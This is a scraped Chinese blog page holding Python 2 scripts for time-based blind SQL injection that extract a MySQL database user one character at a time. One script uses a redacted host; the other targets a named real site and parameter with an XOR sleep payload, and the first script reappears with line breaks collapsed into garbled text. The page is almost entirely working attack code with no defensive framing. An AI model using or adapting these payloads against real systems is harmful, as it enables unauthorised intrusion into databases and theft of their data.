• 时间盲注脚本.py


    时间盲注脚本

     1 #!/usr/bin/env python
     2 # -*- coding: utf-8 -*-
     3 import requests
     4 import time
     5 
     6 payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'    #匹配用的字符串
     7 
     8 user=''
     9 print 'Start to retrive current user:'
    10 for i in range(1,23):
    11         for payload in payloads:    #遍历取出字符
    12                 startTime=time.time()
    13                 url = """http://XXXXX.cn/default.php?fid=1-if(now()<sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(user(),"""+str(i)+""",1))="""+str(ord(payload))+""",sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/"""
    14                 response=requests.get(url, timeout=30)
    15                 if time.time() - startTime > 15:
    16                         user =payload
    17                         print 'user is:', user
    18                         break
    19 print '
    [Done] current user is %s' % user
    #encoding=utf-8
    import httplib
    import time
    import string
    import sys
    import random
    import urllib
    
    headers = {}
    payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.ABCDEFGHIJKLMNOPQRST'
    print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
    user = ''
    for i in range(1, 21):#21是user判断出的长度+1
        for payload in payloads:
            try:
                s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
                s = "aaa'XOR(if(%s,sleep(3),0))OR'bbb" % s
                conn = httplib.HTTPConnection('kact.kingdee.com', timeout=3)#输入网站地址
                conn.request(method='GET',url="/world/createArticle?corp_id=%s" % urllib.quote(s))
                conn.getresponse()
                conn.close()
                print '.',
            except:
                user += payload
                print '
    [in progress]', user,
                time.sleep(3.0)
                break
            
    print '
    [Done] MySQL user is %s' % user
    

      

    #!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport time
    payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'    #匹配用的字符串
    user=''print 'Start to retrive current user:'for i in range(1,23):        for payload in payloads:    #遍历取出字符                startTime=time.time()                url = """http://XXXXX.cn/default.php?fid=1-if(now()<sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(user(),"""+str(i)+""",1))="""+str(ord(payload))+""",sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/"""                response=requests.get(url, timeout=30)                if time.time() - startTime > 15:                        user =payload                        print 'user is:', user                        breakprint ' [Done] current user is %s' % user

  • 相关阅读:
    JavaScript--正则
    PHP-xdebug+PHPStorm的debug安装(未完)
    JavaScript--函数对象的属性caller与callee
    JavaScript--数组与伪数组(特殊对象)的区别
    【原理】scan
    【原理】Reids字典
    【Guava】Guava Cache用法
    【Nginx】缓存配置
    【劫持】网页被注入广告
    【架构】Linux结构
  • 原文地址:https://www.cnblogs.com/nul1/p/8537196.html
Copyright © 2020-2023  润新知